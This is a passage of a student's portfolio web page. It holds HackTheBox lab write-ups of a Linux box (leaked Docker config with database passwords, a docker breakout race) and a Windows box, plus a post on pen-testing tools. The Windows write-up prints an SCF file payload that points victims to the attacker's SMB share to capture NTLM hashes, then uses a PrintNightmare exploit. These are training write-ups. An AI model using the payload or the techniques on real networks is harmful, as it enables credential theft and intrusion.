          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
